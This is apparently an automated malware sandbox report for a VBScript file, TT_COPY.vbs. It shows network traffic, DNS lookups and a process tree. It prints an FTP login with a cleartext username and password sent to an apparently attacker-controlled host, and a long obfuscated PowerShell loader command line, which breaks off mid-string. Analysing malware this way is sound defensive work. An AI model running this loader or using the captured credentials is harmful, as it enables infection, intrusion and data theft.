                    Dec 1, 2022 15:50:08.081856012 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.081902027 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.081954956 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.082016945 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.082053900 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.082114935 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.082170010 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.082199097 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.082284927 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.082309008 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.082384109 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.082386017 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.082467079 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.082484007 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.082640886 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.082642078 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199069977 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199163914 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199234009 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199280024 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199325085 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199340105 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199431896 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199433088 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199513912 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199537039 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199625015 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199642897 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199718952 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199779034 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199779034 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199800968 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199896097 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.199898958 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199980021 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.199994087 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200078964 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200102091 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200170040 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200193882 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200242043 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200298071 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200406075 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200414896 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200445890 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200512886 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200567007 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200593948 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200666904 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200690985 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200757027 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200782061 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200845003 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.200884104 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.200953960 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.201098919 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.317081928 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317156076 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317269087 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317286015 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.317331076 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.317449093 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.317534924 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317636013 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317718029 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317720890 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.317816019 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317830086 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.317898989 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.317903996 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.317989111 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318079948 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318099022 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318223000 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318259954 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318301916 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318368912 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318428040 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318454027 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318506956 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318511963 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318578959 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318593025 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318670034 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318680048 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318752050 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318769932 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318840027 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318866014 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318913937 CET4982480192.168.11.20192.185.145.188
                    Dec 1, 2022 15:50:08.318928957 CET8049824192.185.145.188192.168.11.20
                    Dec 1, 2022 15:50:08.318994999 CET4982480192.168.11.20192.185.145.188
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 1, 2022 15:50:07.807889938 CET5360453192.168.11.201.1.1.1
                    Dec 1, 2022 15:50:07.826406956 CET53536041.1.1.1192.168.11.20
                    Dec 1, 2022 15:50:15.606538057 CET5241253192.168.11.201.1.1.1
                    Dec 1, 2022 15:50:15.837896109 CET53524121.1.1.1192.168.11.20
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Dec 1, 2022 15:50:07.807889938 CET192.168.11.201.1.1.10xab96Standard query (0)b3solutionscws.comA (IP address)IN (0x0001)false
                    Dec 1, 2022 15:50:15.606538057 CET192.168.11.201.1.1.10xa887Standard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Dec 1, 2022 15:50:07.826406956 CET1.1.1.1192.168.11.200xab96No error (0)b3solutionscws.com192.185.145.188A (IP address)IN (0x0001)false
                    Dec 1, 2022 15:50:15.837896109 CET1.1.1.1192.168.11.200xa887No error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false
                    • b3solutionscws.com
                    TimestampSource PortDest PortSource IPDest IPCommands
                    Dec 1, 2022 15:50:15.910717964 CET2149825185.31.121.136192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Dec 1, 2022 15:50:15.911051989 CET4982521192.168.11.20185.31.121.136USER noffice@mcmprint.net
                    Dec 1, 2022 15:50:15.943161011 CET2149825185.31.121.136192.168.11.20331 User noffice@mcmprint.net OK. Password required
                    Dec 1, 2022 15:50:15.943381071 CET4982521192.168.11.20185.31.121.136PASS 2K-0}h.[5hb)
                    Dec 1, 2022 15:50:19.780215979 CET2149825185.31.121.136192.168.11.20530 Login authentication failed
                    Dec 1, 2022 15:50:19.816060066 CET2149825185.31.121.136192.168.11.20530 Logout.

                    Click to jump to process

                    Target ID:0
                    Start time:15:50:14
                    Start date:01/12/2022
                    Path:C:\Windows\System32\wscript.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
                    Imagebase:0x7ff6961b0000
                    File size:170496 bytes
                    MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:2
                    Start time:15:50:34
                    Start date:01/12/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0Me Sp'RiEUn2NeCSt0SkDFa1MaEMa8ShCLiAFoCMa1TrDSi0FlCca9SoCGr0PhEDeDDeCBu4ClCAfBExCVa1BeCEn9UnCAn0By'Ga;Fl`$StFRdoRergasprkNonNoiNrnVagSmsFortiePrsCuuGulPitlyaDitUleLlrRusZa6bi=KlSComPuePlrRitNeeManDesAtbHvaMerPonBlsRe0Ha St'DrFUn7CoFFr1GeFPh6GlDSp5PrCTi0AdCje6EkCStCLiCTe4ExCTe9ViEVaBInCPr4UdCAm8EuCCu0Sp8fe9Sh8Pl5FaENeDFaCFrCPrCSp1WhCGa0InETr7maDSkCSuFMa6UdCKaCDuCPa2Ki8Te9Bi8Pl5NiFde5GyDRi0NoCSa7PsCMe9GaCCaCklCEn6Au'Ko;Ce`$meFAioAnrAnsOpkSmnPsiannUngPisAprTreFlsBluDelAftStaLatOveberStsBr7Sa=hySTamSteGrrFotRieOfnSesTobJuaLurSonPrsEp0St Kr'ViFVu7ChDEn0SkCKiBTrDFu1ceCHjCReCSu8TaCMo0tr8Je9Cr8Te5IrEdi8BiCDo4GeCCuBOpCMi4ReCBa2KuCId0SuCCa1Pe'gi;Fl`$StFHaoForSksFokAunUniUnnScgAfsSyrAfeDisSvuKalUntalaNatSoeAarGrsSa8Bl=BeSShmpreEerTytOreKanOvsOnbPaaKnrSknFisKi0Fo Kh'LiFSw7SuCQu0BlCOg3meCSp9DrCUd0MeCRe6CrDHa1LeCKo0VeCOv1FaEIm1SiCSk0UnCAn9BeCko0AuCln2DeCAc4boDbe1PiCSu0Da'No;Fi`$KeFLaoPerBasInkScnSpiKinDigPrsSbrIreWhsSruhilBetHaaMatKaebirZasSp9He=TeSJumVseDurSetSveKongasNebAsatwrBuninsDe0Su Be'ZyESlCBrCPlBUnESl8StCAf0KaCOu8JuCFoAMaDRe7LiDBeCudELa8OpCYdALyCEk1leDMa0PrCSn9luCAf0Gr'He;Ba`$CoGPrhSpeSpgCaiResSehMe0Re=opSSomAgeSgrCotVeeAdnCosNobDoaOmrfunPhsSi0Kl Re'MeEFo8HiDMoCSaECo1DeCSh0PrCFo9DoCun0BeCUo2PoCta4FoDXe1PrCMi0InFRo1BaDViCHaDMa5SvCSu0br'bo;Lo`$ErGTahUseTagFliTisUnhPl1In=FeSSumGrePrrRitAeeCunGrsDebOvaSkrTinHesAf0Da Mi'xmEfo6TaCUn9SyCTo4LsDde6GrDUn6No8Ko9At8Os5NoFRa5OmDAn0OrCUn7StCUn9ByCRuCLiCIs6Sk8Em9Ru8No5SiFLb6opCAl0HuCCa4PiCEn9MaCPi0JuCOv1Un8Ef9Ca8Ga5ReEDr4BaCFoBShDVa6AlCquCKvEOs6AmCUp9HeCOv4ApDSa6CaDOb6Pa8Wa9Lu8Ps5LoEVa4DyDPi0ReDDi1MiCKoAStECo6UlCMa9HjCMu4OxDIm6UnDSn6Pa'Mu;Ob`$AnGRehenespgSeiansFahFe2co=AcSGymMiemurretWoeAlnYnsSebanaSlrTrnFosst0br Re'SkEFuCMoCPrBStDTe3BgCHyAOxCMoESyCBj0Bi'Ni;Da`$SuGSnhnoeFigNaisisPahDr3St=DaSJomGleBorpitDyeVanDusBibHeaSprGrndusRu0Sp Us'SeFal5BeDEr0RuCKo7CaCOp9OpCFaCReCEt6Ko8In9Re8Ry5RiEhaDPlCArCBeCGa1haCAs0BaELu7IoDBaCBoFPa6LaCInCCaCKl2Th8Ko9Op8He5InEHoBTaCMi0AfDVi2BaFSk6ReCFo9AnCDaASpDKi1Va8Ar9Al8Bi5SlFpr3VoCSlCFaDre7CuDRe1muDTa0HeCLe4OlCVo9Wr'Be;Im`$BoGTehCheSlgKeiKvsDohSl4Dy=LoSTomNjeInrBotNoeStnSvsDibPeaPlrTinOvsPi0He Ne'PrFNo3IlCEvCKlDFo7UnDRe1HeDBe0EtCPr4inCMi9FjECo4HvCOr9OmCOn9coCAnANaCBa6Ge'Kn;So`$StGChhHaeSpgMfiBrsochDi5St=DrSSpmHaeharPstdoeArnNosPibfoaCarConBusIn0Mi at'EnCCiBDiDKa1SwCHe1SkCan9UrCCo9Fo'Fl;Ga`$IdGMihDeelagTiiUdsHyhLe6Ca=FoSfomQueMarGotGreJvnPrsHjbTnaDerDinFosAs0Sp An'SvEGgBSaDDu1BiFNo5ZyDRi7JoCAnABiDSp1UsCMu0FiCSe6giDpo1ReFEg3SuCFoCKvDPe7InDRe1CoDDe0InCRa4BoCNa9UnEAp8DaCSh0smCBl8LoCGaASyDKa7AvDNiCDi'Br;Kn`$MaGSohLoeDigThifosPohSe7Br=MiSBomDiePlrSptClePenGasWobPaaPtrSlnUnsRe0Ld Mu'udETiCFaECo0DiFBeDUn'Fe;Ap`$LeGKrhMieurgGoiMasTuhHe8Op=KoSBemRaeMirfrtRheOhnClsMubLaaOmrFinvasRe0Ro Vi'grFFr9Tr'Cu;MefDiuNonAacCltyoiYooNonTv ShfSnkGypto Ho{UnPPoaGurMoaHomHy Un(My`$RyUOppAfgGarfooTewEknAc,Va Fi`$ApDafeLapSprMyeFesLosthiRioEknHjsUnpimeSerBuiStoWhdmaePrrbi)Im La Ma vi Re Kr;En`$InHUnoRoeGtrFieFrsKo0Na uf=TeSSpmGoeAdrTktmieFrntosbebFeaRirVenansLa0Bi Un'Fe8Jv1SwEChEunDPo7DeCRe8WhCSm8CeCSy0UnDEx7OmCMe0SaCKaBSu8Sy5Ud9Vi8To8in5Pa8anDFlFReEGuEAf4IcDLa5knDpo5RaECo1prCViAEnCFi8CiCAr4ViCWoCDyCSeBVaFAr8st9VaFZo9UdFCaESc6FlDKl0coDUn7KeDFl7CoChy0BrCUbBPaDBo1UnEve1DiCBiAAfCFl8SaCMa4vaChaCFaCSyBHe8EbBJuEAt2UoCPi0AeDNe1unELa4InDKa6MiDIs6FlCAu0UdCPo8NoCTi7AlCHi9UnCTeCUnCTr0FuDMy6In8liDDa8opCTe8Tr5SeDPr9Er8Bu5VrFDi2ArCLaDFuCBu0MeDPl7snCDe0Br8Ph8PaEReARrCSe7TaCflFSiCRe0UnCBl6UsDTy1Ma8Ho5GeDdrEFo8Bi5Pu8Te1AnFKoAGr8PeBFoEwo2ReCSp9TiCBeAAlCOp7EnCSe4PrCSv9SkELi4deDLo6NeDSu6OrCSv0EkCFo8faCDo7UnCOu9OpDHeCCoEIl6MuCBa4DeCNe6ClCToDCoCCe0Di8Ne5Im8Ne8AdEOp4LiCCaBLaCIc1Ko8Ku5Br8kl1moFShATr8KuBTaEWa9unCSvADaCBe6ThCKo4CoDFr1SiCOiCStCBeAJeCTaBAl8SyBwiFBu6MaDSt5PlCIs9RtCHyCTuDWh1Sp8svDPa8Co1CiEBe2LiCReDDeCNe0MoCFe2TyCBlCMeDPe6TrCRvDPo9NrDSu8StCLiFKoEde8Ko8Ac9Ta4RuFIn8Ma8fiBRyEPr0ToDSk4LiDme0ReCRe4PaCBa9AdDSk6Ka8ErDSp8Un1SeEPr3EyCcrAAvDFa7SpDUn6AeCCoEUnCKoBPrCReCReCOvBFoCBi2SuDTr6PaDTe7CoChu0LoDco6AaDVa0NoCEn9BaDSu1MeCSt4PaDMo1ChCBr0OpDJo7KuDCo6Gn9Ma5No8NeCTr8De5AnDTe8Dy8StCFa8PrBSeESn2CaCVi0EvDVe1KrFPo1InDPaCSuDHa5BiCSt0Su8AnDTa8Om1SkETy3KnCCoADiDBo7OpDBa6PaCDaEbuCBiBTrCPeCInCOtBOpCVa2UdDEf6ReDCo7BaCte0GaDSo6KoDOm0LeCRd9FoDDe1CoCSm4GaDDe1IrCOi0NyDLi7ElDFa6Li9Ov4Cl8AnCFl'Kr;Li&Bi(Ud`$BeGPlhFeeFogReiInsRehMe7Cu)Ep No`$TuHVaoBreSirDaeAmsSv0Un;Un`$IsHRuoFieFnrPrevisDi5Un Lv=St SlSStmHaeBarSmtCheSinShsBubchaBorHenPlsSp0Mu Se'Be8St1caEsu6BoCBeDViCudCPsCDi9FaCMe9En8Us5Un9Pe8So8Li5Pe8Ua1FoEUnEChDNd7OkCSv8SuCAm8RyCFr0UnDDi7SoCLa0PrCAtBTr8DoBSuESy2OuCSn0CoDFl1NrEKe8SpCBa0PrDIn1MaCTeDSeCSuAScCSa1Me8GaDTh8Es1FrEEm3YoCBiADaDbo7RuDPy6OsCBeEOpCSaBTrCEqCTjCBaBLnCHj2TrDDi6tuDPa7UrCEg0HeDEp6HaDKu0BaCPe9PrDUn1DiCTa4SuDMy1ReCKe0MaDTe7GjDIr6Di9Co7Bl8Fi9Bi8Di5ShFBiEspFKo1StDSlCCoDLa5UpCTr0spFEnEWeFUn8bgFSp8Pu8En5joEDi5De8RuDSk8La1SoEin3BoCklAToDCh7DyDDe6CeCOlEToCWiBPrCTjCYuCRuBStCFr2UnDKr6SrDNo7EnCHv0FeDJu6LeDDi0FoCBi9DeDRe1StCIm4HaDBl1GuCch0VeDDy7ToDPr6Ar9Pr6Ta8be9de8Su5Re8Pn1PaEMe3NaCApATeDCa7OxDRe6GoCAnEMiCMoBCaCNoCUfCSpBovCAn2spDNe6ByDCh7GlCMe0SuDSy6FlDRe0KwCno9OvDDe1FoCRe4noDBr1AlCUn0HiDRe7LoDor6Ru9Ek1Un8TwCIn8ViCEy'Ri;Or&no(Li`$HeGSkhJoefigFriGussthMa7Io)Ve Ty`$TyHReoDieCarLieSisAt5Li;An`$LeHAsoCeeForDeeAfsSi1Ud Pe=Da UnSChmSeeRurFetFieNenBesVibKoaagrvinOvsEx0La Hj'UnDFr7meCBe0SuDFi1SeDRe0FoDAn7TaCTrBIs8br5Pe8Di1AfERa6StCAfDDaCFoCTrCMa9UnCSp9Fl8PoBBuEwaCLoCHuBtrDVe3OuCGuAKvCMeEGrCUd0Sl8FoDOm8Hj1SlCTeBbyDIl0TjCKo9SaCAr9Vi8Un9Fo8Ad5EvETr5St8SiDunFToETvFfr6HoDRiCNaDRh6SeDno1AvCBl0UrCSp8in8TaBReFNe7FoDCr0DeCRoBTaDBe1BoCShCSqCOs8BeCSo0Po8RaBImEOvCAfCFoBReDMa1gaCRy0KoDCe7PeCMyAMeDSv5SpFRu6TaCNi0OdDAs7PlDRe3prCAmCRaCTa6SyCAn0ByDDi6Sj8noBReENeDUnCAa4UaCPiBHeCHa1DiCPa9CaCPa0GaFAn7SaCUd0PaCDe3HaFSt8Ex8ElDBiENoBShCnu0ItDBy2Co8Ac8SvEHoACyCfr7feCstFTeCEn0SwCGe6ViDBu1Di8Ti5ThFTe6HeDDiCIvDPl6AcDKs1CrCSu0EcCQu8Fo8gnBLaFCh7PrDGa0BoCNoBNeDKb1PrCDoCLaCpr8QuCbr0Je8NaBFoEWoCInCFaBReDha1emCMo0PaDMe7TuCShAKrDLa5OmFAl6SpCNe0ChDBe7BeDRe3MeCFiCIrCBr6CoCCo0ThDUn6Re8SkBUnEnuDOmCCo4AlCNaBOmCRe1WiCid9LoCMo0BoFSy7NoCCa0unCSt3Av8SiDde8EdDUtEKaBEsCKa0UnDav2Hu8Su8udEBoAJuCBu7VaCUlFOvCPe0EnCUn6KiDTr1Al8Ra5MoEDaCGyCSaBTaDBd1HjFKu5UnDHo1SkDKa7Au8FoCVe8Sp9Ua8Ir5In8PiDKo8Lo1UnEorEpeDMo7HaCKr8AfCTa8NoCPo0IrDes7LaCDr0RaCDeBSk8AtBShESc2ArCOp0BrDam1AbEKb8MaCFo0HeDLe1saCplDPlCPrABaCKa1Ho8BuDAf8Dy1CaEKa3SpCSnAekDel7SuDDi6AnCTeESaCBuBUnCErCSaCTrBEuCPa2InDPl6EnDOk7ToCSu0ObDRa6alDAf0PrCVe9ItDSn1ByCKo4clDAb1PeCAp0HeDMa7UrDdi6Af9Sp0Ra8TeCFi8UgCse8InBMeEAbCMoCHnBUnDRe3UnCSvATeCReEMeCBl0Re8BoDHe8Fa1StCtrBbeDDo0BeCUn9KiCMi9Fa8De9In8Sn5BeESt5Ea8OvDHa8Br1udFSp0HeDGa5GuCIs2LeDSi7DjCPoAsiDHe2OsCRiBUn8SaCEl8ouCRe8AnCSp8TrCDo8Ka9Hj8Jo5In8Pr1TyESm1MiCop0ViDAs5afDGr7ExCPl0AuDAc6PhDPr6CoCfoCKlCTuAUnCSnBcoDTh6ToDBe5UnCUn0PuDBr7ClCUnCFuCDeAArCMa1SeCTi0VaDTi7Fr8spCFr8MeCpe'Af;El&Ag(Ov`$BeGLahOpeChgHuiSksPrhFo7El)Se Eu`$UnHNaoEmeNurLyePasIa1Bu;Pa}DefTouRenDacAmtMaiKaoBanJe SkGDiDHaTNe aa{KaPslaJurGtaFamHa Co(Ej[SaPOpaBarSiaBemCaeThtSteoprHy(BrPUnoAnsFyiSetafiMeokinOr Kl=Sk Re0Ph,Fi FaMImaRenMidCaaCatFooKrrdkyHa Mi=Sp Su`$PeTBerZauEmeUd)Mu]Oo Sq[BeTPlybapUdeAg[Ko]Me]Av ti`$SkNTroBenFodSmeVecSuoHarAmoPruRusFrlBeyHj,fu[EwPflamarUnaTomFaeSptImeamrAu(SkPChoTosphiUjtPriRaoDinCa Si=Tr Ga1Bs)La]Ta Dd[DrTExyGipFeeEm]Me Na`$ReCunoNoeIblIniKooComFoyNoaAulgrguniDoaSk Ma=Hy Is[PrVBloCrigldNo]Bu)Au;Ma`$AnHMioSeecarPreKasKo2ex Im=Va JgSNomNoeTorDatboeAnnUnsUnbakalyrTunfrsKl0af 